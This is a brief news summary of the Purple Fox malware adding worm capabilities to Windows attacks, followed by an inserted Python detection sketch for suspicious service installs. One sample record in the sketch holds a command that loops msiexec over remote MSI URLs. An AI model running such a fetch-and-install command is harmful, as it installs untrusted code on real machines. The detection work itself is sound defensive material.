"Purple Fox Malware Targets Windows Machines With New Worm Capabilities"

Researchers at Guardicore Labs have discovered that a malware that has historically targeted exposed Windows machines through phishing and exploit kits has been retooled to add new “worm” capabilities.

Purple Fox, which first appeared in 2018, is an active malware campaign that until recently required user interaction or some kind of third-party tool to infect Windows machines. The adversaries have now upped their game and added new functionality that can brute force its way into victims’ systems on its own.

Researchers analyzed Purple Fox’s latest activity and found two significant changes to how attackers are propagating malware on Windows machines. The first is that the new worm payload executes after a victim machine is compromised through a vulnerable exposed service (such as SMB).

Purple Fox also is using a previous tactic to infect machines with malware through a phishing campaign, sending the payload via email to exploit a browser vulnerability, researchers observed.

Once the worm infects a victim’s machine, it creates a new service to establish persistence and execute a simple command that can iterate through several URLs that include the MSI for installing Purple Fox on a compromised machine.
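The persistence behaviour described above (a newly created service whose command works through several URLs pointing at an MSI) can be hunted for in service-installation records. The following is an added detection sketch, not code from Guardicore or Threatpost; it assumes the records were exported as dicts carrying the ServiceName and ImagePath fields of Windows "service installed" events (System log, Event ID 7045), and every host name, service name and URL in the sample is constructed.

```python
import re

# Assumption: records mirror the ServiceName and ImagePath fields of Windows
# "service installed" events (System log, Event ID 7045), exported to dicts.
URL_RE = re.compile(r"https?://[^\s\"'()&|]+", re.IGNORECASE)

def remote_msi_urls(image_path):
    """Return the distinct http(s) URLs in a service command line that point at an .msi."""
    urls = []
    for url in URL_RE.findall(image_path):
        path = url.split("?", 1)[0].split("#", 1)[0]  # ignore query string / fragment
        if path.lower().endswith(".msi") and url not in urls:
            urls.append(url)
    return urls

def triage_service_installs(records):
    """Flag new services whose command references an MSI at a remote URL.

    Severity is "high" when the command lists several candidate URLs (the
    iteration behaviour described in the article), "medium" for a single URL.
    """
    findings = []
    for rec in records:
        urls = remote_msi_urls(rec.get("ImagePath", ""))
        if not urls:
            continue
        findings.append({
            "host": rec.get("Computer", "unknown"),
            "service": rec.get("ServiceName", ""),
            "urls": urls,
            "severity": "high" if len(urls) > 1 else "medium",
        })
    return findings

# Constructed sample records (not taken from the report); all values are placeholders.
SAMPLE = [
    {"Computer": "ws-014", "ServiceName": "PrintSpoolHelper",
     "ImagePath": r"C:\Windows\System32\svchost.exe -k netsvcs"},
    {"Computer": "srv-smb-02", "ServiceName": "svc-demo",
     "ImagePath": "cmd /c for %i in (http://192.0.2.10:8080/a.msi "
                  "http://198.51.100.7/pkg/B.MSI) do msiexec /i %i /q"},
    {"Computer": "ws-022", "ServiceName": "Updater",
     "ImagePath": "msiexec /i https://updates.example.test/agent.msi?v=3 /qn"},
]

if __name__ == "__main__":
    for f in triage_service_installs(SAMPLE):
        print(f["severity"], f["host"], f["service"], f["urls"])
```

A "medium" hit can be legitimate software deployment, so findings should be reviewed against the organisation's known installers before escalation.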

Threatpost reports: "Purple Fox Malware Targets Windows Machines With New Worm Capabilities"
